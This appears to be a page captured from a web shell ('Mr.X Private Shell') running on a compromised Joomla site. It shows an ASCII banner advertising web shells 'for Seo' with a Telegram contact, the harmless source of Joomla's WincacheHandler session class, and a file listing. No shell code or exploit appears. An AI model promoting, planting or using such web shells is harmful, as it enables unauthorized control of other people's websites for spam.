__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Part of the Joomla Framework Session Package
*
* @copyright Copyright (C) 2005 - 2021 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/
namespace Joomla\Session\Handler;
use Joomla\Session\HandlerInterface;
/**
* Wincache session storage handler
*
* @since 2.0.0
*/
class WincacheHandler extends \SessionHandler implements HandlerInterface
{
/**
* Constructor
*
* @since 2.0.0
*/
public function __construct()
{
if (!headers_sent()) {
ini_set('session.save_handler', 'wincache');
}
}
/**
* Test to see if the HandlerInterface is available
*
* @return boolean True on success, false otherwise
*
* @since 2.0.0
*/
public static function isSupported(): bool
{
return \extension_loaded('wincache') && \function_exists('wincache_ucache_get') && !strcmp(ini_get('wincache.ucenabled'), '1');
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| ApcuHandler.php | File | 3.59 KB | 0664 |
|
| DatabaseHandler.php | File | 8.24 KB | 0664 |
|
| FilesystemHandler.php | File | 2.29 KB | 0664 |
|
| MemcachedHandler.php | File | 3.98 KB | 0664 |
|
| RedisHandler.php | File | 4.04 KB | 0664 |
|
| WincacheHandler.php | File | 1014 B | 0664 |
|